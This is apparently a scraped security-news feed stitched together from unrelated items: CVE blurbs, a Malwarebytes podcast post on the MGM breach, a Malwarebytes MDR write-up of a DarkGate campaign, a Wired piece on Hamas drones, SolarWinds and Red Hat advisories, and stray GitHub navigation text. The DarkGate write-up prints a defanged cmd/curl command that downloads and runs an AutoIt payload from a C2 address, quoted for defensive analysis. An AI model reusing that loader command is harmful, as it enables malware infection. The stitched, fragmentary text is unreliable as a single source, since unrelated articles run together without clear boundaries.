Zscaler Client Connector for macOS prior to 3.7 had an unquoted search path vulnerability via the PATH variable. A local adversary may be able to execute code with root privileges.




CVE-2021-26738

Categories: Podcast
This week on the Lock and Code podcast, we speak with James Fair about the reluctance of some businesses to take cybersecurity seriously, even in the face of major attacks. 



(Read more...)




The post MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22 appeared first on Malwarebytes Labs.

_This week on the Lock and Code podcast..._

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media... but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company's flagship hotel complex near the southern end of the Las Vegas strip—that didn't involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn't just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn't stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator's handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company's budget—and its relative ability to devote resources to cybersecurity—doesn't necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he's seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

> "How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?"

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

Categories: Business
On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.  



(Read more...)




The post Battling a new DarkGate malware campaign with Malwarebytes MDR  appeared first on Malwarebytes Labs.

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

**The Initial Incident**

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named "**C\_onfidential Sign\_ificant Company Changes.zip**" (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included "**EMPLOYEES\_AFFECTED\_BY\_TRANSITION.PDF.LNK"** and "**COMPANY\_TRANSFORMATIONS.PDF.LNK**".

**The Malicious Command**

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a 'Known bad' destination and blocked it.

Multiple attempts to execute processes such as curl commands

**DarkGate Loader - The Culprit**

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim's machine:

"C:\\Windows\\System32\\cmd.exe" /k curl -# -o

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe" "

http://5\[.\]188\[.\]87\[.\]58:2351" -o

"C:\\Users\\\[Redacted\]AppData\\Local\\Temp\\btbgvbyy.au3"

"http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy" "C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\Autoit3.exe"

"C:\\Users\\\[Redacted\]\\AppData\\Local\\Temp\\btbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (**btbgvbyy.au3**). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

Malwarebytes EDR recognizing suspicious AutoIt activity

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

**Actions Taken**

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

**Lessons from the Incident**

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

**Indicators of Compromise (IoC)****File Details:**

Filename: C\_onfidential Sign\_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

**Network Indicators:**

C2 IP Address: 5\[.\]188\[.\]87\[.\]58

**Malicious URLs:**

http://5\[.\]188\[.\]87\[.\]58:2351

http://5\[.\]188\[.\]87\[.\]58:2351/msibtbgvbyy

Battling a new DarkGate malware campaign with Malwarebytes MDR 

Categories: News
Tags: week

Tags:  security

Tags:  October 

Tags:  2023

A list of topics we covered in the week of October 16 to October 22 of 2023



(Read more...)




The post A week in security (October 16 - October 22) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

For Personal

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

See all

Company

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 16 - October 22)

Last week on Malwarebytes Labs: Stay safe! Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting...

October 30, 2023 - Last week on Malwarebytes Labs: Stay safe! Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap,...

October 29, 2023 - Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating...

October 27, 2023 - Octo Tempest is believed to be a group of native English speaking cybercriminals that uses social engineering campaigns to compromise organizations...

October 27, 2023 - Apple has released security updates for its phones, iPads, Macs, watches and TVs. Updates are available for these products: The important...

October 25, 2023 - VMWare has issued an update to address one out-of-bounds write and one information disclosure vulnerability in its server management software, vCenter Server. Since...

 A week in security (October 16 &#8211; October 22) 

Hamas has long touted its military drones, but little is known about the true scale of the threat. The answer may have consequences for people on both sides of the Israel-Gaza border.

When Hamas launched its attacks against Israel on October 7, it unleashed a flood of rockets as cover, while militants streamed through holes in the fence surrounding the Gaza strip. One particular clip released by Hamas, played on news stations the world over, provoked a particular bit of paranoia: video of balaclava-clad Hamas fighters standing in a desert landscape, launching a line of suicide drones.

Amid the terror and chaos, the video seems to underscore a long-held fear that Hamas—with the help of Iranian technology—had developed the ability to conduct air strikes on Israel. What’s more, these drones may prove more adept than Hamas’ supply of rockets at thwarting Israel’s sophisticated Iron Dome air defense system.

Hamas had been building this capacity for some time. In 2022, it touted its drone program with an ominous warning: Israel no longer had a monopoly on its skies. According to Hamas Telegram channels, roughly 40 suicide drones have been fired toward Israel since the war began earlier this month. Yet, besides some undated propaganda videos, there is scant evidence that these drones have actually been deployed against Israel—and, if they have, they don’t appear to have done much damage.

Drone warfare has dramatically altered the dynamics in a number of recent conflicts—from Ukraine to Nagorno-Karabakh to Yemen—but not in the war between Hamas and Israel.

Why? The answer could have significant implications for people on both sides of the Israel-Gaza border.

Since the early 2000s, Hamas, which was elected to lead Gaza’s government in 2006 and has held power ever since, has drastically scaled up its ability to hit targets inside Israel.

The earliest versions of its Qassam rocket were rudimentary: lightweight and capable of traveling just a few miles. In each successive generation of the missile, however, they became bigger, capable of flying farther, and equipped with larger warheads.

Over the past two decades, Hamas and Israel have engaged in a race—Hamas, to develop its offensive capabilities and extend its reach; and Israel, to frustrate those efforts as much as possible.

Like more than 20 non-state actors in conflict zones around the world, Hamas recognized that the drones could substantially upgrade its ability to wage war. Unlike its unguided missiles, which are designed to beat Israel’s air defenses simply by overwhelming them, drones are considerably harder to intercept. They fly low and don’t travel in a predictable, parabolic arch. As a number of countries have recently learned, thwarting an advancing drone—much less a number of them—is a tricky problem to solve.

Unlike Russia or Ukraine, Hamas couldn’t source military drones through an open tender. So it tapped Tunisian-born aerospace engineer Mohamed Zouari to, in the early 2010s, design Hamas’ first fleet of operational drones and stand up an industry to produce them. They called the first model Ababeel1, which was very similar to an Iranian drone and had three different models. One version was designed to conduct surveillance, one to deliver small munitions, and the third was a suicide drone.

Israel began targeting Hamas’ drone program before it even produced results, striking a production facility in 2012. But the program continued.

Around that time, there were ample signs that Hamas’ domestic production capacity had not grown as it had hoped. Small—probably commercial—drones were dispatched into Israel from Gaza in 2012 and 2013, according to reports of a talk by an Israeli air defense official. Israeli jets and anti-air systems soon began to intercept the drones over Israeli airspace. Around 2014, Hamas made headlines after claiming it had penetrated deep into Israeli airspace, flying over Tel Aviv. But analysts say, despite Hamas’ insistence, the drones were not locally made in the Gaza strip: They were likely the Ababil-1, a product of the Iranian drone program.

In 2016, Zouari was assassinated in his hometown of Sfax, Tunisia, in what has been described by Tunisian investigators as a multiyear operation. While Israel did not admit responsibility for the killing, then-defense minister Avigdor Lieberman said only that Israel “will continue to do in the best possible way what we know how to do—that is to protect our interests.” Fadi al-Batsh, who had written papers on drone technology and who Israeli media alleged was part of Hamas’ drone program, was assassinated in 2018. Lieberman suggested that al-Batsh was killed as part of a “settling of scores among terrorist organizations.” In January 2022, the Hamas-led Gaza Interior Ministry arrested a Gaza resident for al-Batsh’s death and alleged the man worked for Mossad, Israel’s intelligence agency.

As Hamas seemed to struggle to establish its own domestic drone industry, other non-state actors began showing just how devastating these unmanned aerial vehicles (UAVs) could be. The Islamic State leveraged a huge number of commercial and hobbyist drones to conduct reconnaissance and drop grenades on advancing forces. Houthi rebels in Yemen began deploying sophisticated attack drones in its fight against the state military—analysts noted that, despite claims that these drones were locally made, they bore striking similarities to Iranian attack drones.

Faced with the looming possibility that Hamas could leverage some of the same techniques, Israel began running drills, practicing with fighter jets to intercept UAVs. In February 2014, it announced a prototype of a new air defense system: The “Iron Beam”—a directed energy weapon which, it hoped, will be able to track and destroy incoming drones.

In 2021, Hamas again sounded the trumpets over its supposedly game-changing drone program. This time it unveiled a whole new model: the Shehab. The suicide drones starred in slickly made propaganda videos and have been lionized for years in Hamas communiques. Yet they proved woefully ineffective in the field. Some were intercepted by the Iron Dome (as was one Israeli reconnaissance UAV) while others were shot down by F-16 jets. Video footage and unverified claims from Hamas suggest that one drone may have exploded near an Israeli chemical plant in May 2014—but appeared to do little to no damage.

Despite the program’s Iranian influence, Hamas claimed some of its drones were “locally made.” It said in a May 2022 press release that its drone program had made major progress, and it touted these new drones as a “turning point” for its fight against Israel. In September 2022, Hamas inaugurated “Shehab Square,” a public square featuring a model of the suicide drone on a pillar.

Despite all this fanfare, a December 2022 report from the International Center for Counter-Terrorism (ICCT) took a dim view of Hamas’ drone program. “Hamas has not demonstrated any ability to regularly use drones successfully,” the researchers wrote. As to why Hamas would continue investing in a capability that has such a poor record, the ICCT surmised that “the association of drone technology with military status may explain the group’s continued employment of drones.”

What’s more, the ICCT noted that Hamas’ technical failures seemed to be compounded by a lack of strategy or plan for what to do with these drones. The paper suggested that Hamas may lack the technical know-how to use these drones effectively, that it may be ineffective against Israel’s defenses, or possibly that “the group is more concerned about being seen using drones than using them effectively.”

“I think it’s surprising that Hamas didn’t use more commercial and tactical drones in its invasion,” Paul Lushenko wrote on Twitter in the hours after Hamas’ October 7 assault on Israel. “For all the concern of an Israeli intelligence failure, I think the lack of Hamas’ use of drones suggests poor organizational learning.”

Lushenko is a faculty professor at the United States Army War College and an expert in the emerging field of drone warfare. Speaking with WIRED, Lushenko says there’s little sign that Hamas, despite their usual bragging, actually managed to put its drone program into action. “We haven’t seen the evidence.”

Certainly, Hamas made some targeted use of several over-the-counter drones and quadcopters—similar to how the Islamic State deployed the UAVs during its brief control of a proclaimed caliphate. Videos reportedly released by Hamas purportedly showed drones dropping explosive devices on Israeli communications towers and machine gun positions near the Gaza border. These UAVs pose a particular challenge because they are often too small and too nimble to be successfully intercepted. Instead, Israel says it is stepping up jamming efforts to break the link between those drones and their controllers within Gaza.

Beyond those short-range and lightweight UAVs, however, Hamas’ use of its homemade, Iranian-inspired suicide drones seems to be not much more than bluster.

The much-broadcast Hamas propaganda video of its fixed-wing UAVs being fired does not, in fact, show part of the assault on Israel. It was filmed before the attack—the full video shows the suicide drones crashing into a fake Israeli outpost—the explosion knocking over cardboard cutouts, as a blue-and-white Israeli flag flaps nearby.

Hamas Telegram channels have claimed repeatedly in recent weeks that their drones struck positions in Israel but offered little in the way of visual evidence or specifics. One supposed strike was conducted on “a parking lot for vehicles and personnel east of Gaza.” There has been no confirmation of any of these strikes or claims of any damage inflicted.

The Israel Defense Forces declined WIRED’s request to comment on whether it had intercepted any of these drones, writing that “the IDF is currently focused on eliminating the threat from the terrorist organization Hamas.”

There may be two possible explanations for this apparent lack of impact. One is that Hamas has opted to stockpile these drones, saving them for an anticipated Israeli ground operation. The other is that, like past attempts, Hamas’ drone program has simply failed to launch.

The first possibility could pose an enormous challenge for Israel. As we’ve seen on both sides of the Ukraine-Russia war, drones have substantially changed the reality on the ground. While analysts say Russia has used Iranian-made kamikaze drones to attack Ukrainian critical infrastructure, Ukraine has responded with Turkish-made Bayraktar TB2 drones to hammer Russian convoys and defensive positions. Smaller quadcopters have given both sides unparalleled visibility behind enemy lines and have proved remarkably deadly in urban warfare. If Hamas is sitting on a reserve of these drones, to be used if Israeli forces cross into Gaza—where they will not have the protection of the Iron Dome—it could be highly effective at frustrating a possible ground assault.

“It's not uncommon for non-states \[actors\] and states to not use all of their decisive weapons all at once,” James Patton Rogers, executive director of the Cornell Brooks Tech Policy Institute, tells WIRED. “Will this be something that happens in the coming days and weeks? Is this something that was deliberately held back en masse from being launched against Israel?”

The fact that Hamas has, on dozens of occasions over the past two years, fired these drones toward Israel with little to no effect suggests that its reach may have extended its grasp. “We don't know the full impact of those yet, if there wasn't much impact,” Rogers says. “Did they do anything more than the rockets or the mortars would do? Were they able to penetrate the Iron Dome more than a mortar or a rocket?”

Normally, these loitering munitions are more effective at beating missile defense systems, as they tend to fly low and slow, hugging the ground. But given that Israel has one of the most advanced air-defense systems in the world, Hamas may simply not have had the time, capacity, or skill to adequately learn how to overcome the Iron Dome.

“I do think it's a bit too early to tell in this one,” Rogers says.

Lushenko adds that, even if these drones do very little physical damage, the threat they pose will still loom large. “They really have a psychological effect.”

The Dangerous Mystery of Hamas’ Missing ‘Suicide Drones’

stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds read in `DECODE` macro when `var` is negative. As it can be seen in the definition of `DECODE_RAW` a negative `var` is a valid value. This issue may be used to leak internal memory allocation information.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-45682: stb/stb_vorbis.c at 5736b15f7ea0ffb08dd38af21067c314d6a3aae9 · nothings/stb

SolarWinds' access controls contain five high and three critical-severity security vulnerabilities that need to be patched yesterday.

Eight newly discovered vulnerabilities in the SolarWinds Access Rights Manager Tool (ARM) — including three deemed to be of critical severity — could open the door for attackers to gain the highest levels of privilege in any unpatched systems.

As a broad IT management platform, SolarWinds occupies a uniquely sensitive place in corporate networks, as the world learned the hard way three years ago. Its power to oversee and affect critical components in a corporate network is nowhere better epitomized than in its ARM tool, which administrators use to provision, manage, and audit user access rights to data, files, and systems.

So, admins should take note that on Thursday, Trend Micro's Zero Day Initiative (ZDI) revealed a series of "High" and "Critical"-rated vulnerabilities in ARM. As Dustin Childs, head of threat awareness at the ZDI, explains, "The most severe of these bugs would allow a remote unauthenticated attacker to execute arbitrary code at system level. They could completely take over an affected system. While we did not look at exploitability, the potential of these vulnerabilities is about as bad as it gets."

**Serious Issues in SolarWinds ARM**

Two of the eight vulnerabilities — CVE-2023-35181 and CVE-2023-35183 — allow unauthorized users to abuse local resources and incorrect folder permissions to perform local privilege escalation. Each was assigned a "High" severity rating of 7.8 out of 10.

A few more — CVE-2023-35180, CVE-2023-35184, and CVE-2023-35186, all rated 8.8 out of 10 by Trend Micro — open the door for users to abuse a SolarWinds service, or its ARM API, in order to perform remote code execution (RCE).

The most concerning of the bunch, however, are another trio of RCE vulnerabilities that Trend Micro assigned "critical" 9.8 ratings: CVE-2023-35182, CVE-2023-35185, and CVE-2023-35187. (For its part, SolarWinds diverged from Trend Micro here, assigning them all 8.8 ratings.)

In each case, a lack of proper validation for the methods _createGlobalServerChannelInternal_, _OpenFile_, and _OpenClientUpdateFile_, respectively, could enable attackers to run arbitrary code at the SYSTEM level — the highest possible level of privilege on a Windows machine. And unlike the other five bugs released Thursday, these three do not require prior authentication for exploitation.

A new ARM version 2023.2.1, pushed to the public on Wednesday, fixes all eight vulnerabilities. SolarWinds clients are advised to patch immediately.

Critical SolarWinds RCE Bugs Enable Unauthorized Network Takeover

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 13 and Oct. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 13 to October 20

Red Hat Security Advisory 2023-5931-01 - Updated Satellite 6.13 packages that fixes Important security bugs and several regular bugs are now available for Red Hat Satellite. Issues addressed include code execution and denial of service vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5931.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Satellite 6.13.5 Async Security Update  
Advisory ID:        RHSA-2023:5931-01  
Product:            Red Hat Satellite 6  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5931  
Issue date:         2023-10-19  
Revision:           01  
CVE Names:          CVE-2022-1292  
====================================================================

Summary: 

Updated Satellite 6.13 packages that fixes Important security bugs and several regular bugs are now available for Red Hat Satellite.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

Security fix(es):

* Yggdrasil-worker-forwarder (gRPC): Rapid Reset Attack through HTTP/2 enabled web service which leads to DDoS attack (CVE-2023-44487 & CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.

* Foreman: OS command injection via ct_command and fcct_command (CVE-2022-3874)

* Foreman: Arbitrary code execution through yaml global parameters (CVE-2023-0462)

* GitPython: Remote code execution and improper input validation vulnerability (CVE-2022-24439 & CVE-2023-40267)

* Ruby-git & tfm-rubygem-git: Code injection vulnerability (CVE-2022-47318 & CVE-2022-46648)

* Python-django: Multiple flaws (CVE-2023-31047 & CVE-2023-36053)

* Puppet-agent (openssl): Multiple flaws (CVE-2022-1292 CVE-2022-2068)

This update fixes the following bugs:

2238346 - Red Hat supported provisioning templates are not recognized by RH icon on the row for a given template  
2238348 - when creating a backup on rhel7 and restoring on rhel8, the restore process will fail with permission issues  
2238350 - Virtual machine goes in re-provisioning mode while registration host using Global registration template.  
2238359 - Capsule redundantly synces *-Export-Library repos  
2238361 - Can't update the redhat_repository_url without changing the cdn_configuration to custom_cdn  
2238363 - katello-certs-check does not cause the installer to halt execution on failure  
2238367 - Satellite Web UI >> Hosts >> All Hosts page loading slow even after power isn't selected from the new option \"Manage columns\".  
2238369 - Content-export incremental with syncable format based does not include productid file into repodata directory  
2238371 - SELinux is preventing pulpcore-worker from read access on the key labeled pulpcore_server_t  
2239041 - Reclaim space for repository fails with Cannot delete some instances of model 'Artifact' because they are referenced through protected foreign keys: 'ContentArtifact.artifact'.\"  
2238353 - The \"hammer export\" command using single thread encryption causes a performance bottleneck.  
2240781 - Remediation from CRC via Satellite shows \"Failed\" status even after successful remediation of Insights recommendations.   
2241914 - \"NoMethodError: undefined method `fact_values'\" while trying to perform inventory upload

Users of Red Hat Satellite are advised to upgrade to these updated packages, which fix these bugs.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-1292

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_satellite/6.13/html/upgrading_and_updating_red_hat_satellite/index  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Tag

#mac